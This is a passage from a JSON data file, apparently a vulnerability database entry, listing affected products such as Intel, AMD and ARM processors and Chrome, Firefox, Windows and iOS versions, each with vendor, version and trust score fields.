        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440eq"
      },
      {
        "model": "xeon e5 1630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500t"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1515m_v5"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6150"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5528"
      },
      {
        "model": "xeon e3 1220 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "bl2 bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5 1620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "simatic winac rtx \\ 2010",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2010"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "655k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370t"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3230rk"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200y"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7545"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700eq"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7550"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2558"
      },
      {
        "model": "xeon e3 1275 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2637",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250f"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2830"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1505m_v6"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2365m"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3700"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2370m"
      },
      {
        "model": "xeon e3 1246 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402ec"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142f"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v3"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745d"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620ue"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "11"
      },
      {
        "model": "edge",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "amd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arm",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell emc",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fortinet",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hp",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "qualcomm incorporated",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "vmware",
        "version": null
      },
      {
        "model": "windows sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "v8"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intel",
        "version": "v3"
      },
      {
        "model": "cortex a57",
        "scope": null,
        "trust": 0.6,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "pro a8-9600 r7",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      },
      {
        "model": "compute cores 4c+6g",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "amd",
        "version": "10"
      },
      {
        "model": "fx -8320 eight-core processor",
        "scope": null,
        "trust": 0.6,
        "vendor": "amd",
        "version": null
      },
      {
        "model": "windows server",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "redhat",
        "version": "-47.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.924.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375127"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.166"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1012"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1005.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.42"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1039"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.434.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.365.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.879.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.926.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.47255"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.39"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.157"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "11.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.530.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.58"
      },
      {
        "model": "facsmelody",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1308.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.633.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.769.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.127"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.785.0"
      },
      {
        "model": "pro a8-9600 r7 compute cores 4c+6g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "amd",
        "version": "100"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "facscanto ii clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.225"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.385.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.319.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.908.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.204"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.219"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.374.0"
      },
      {
        "model": "pyxis ecostation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.23"
      },
      {
        "model": "facscanto ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.40"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1043"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.604.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.40"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.44"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.150"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.40"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "36.0.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.756.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.123"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.233"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.955.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.760.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.368.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.594.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.118"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.743.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.97"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96365"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.130"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "63.0.3239.86"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
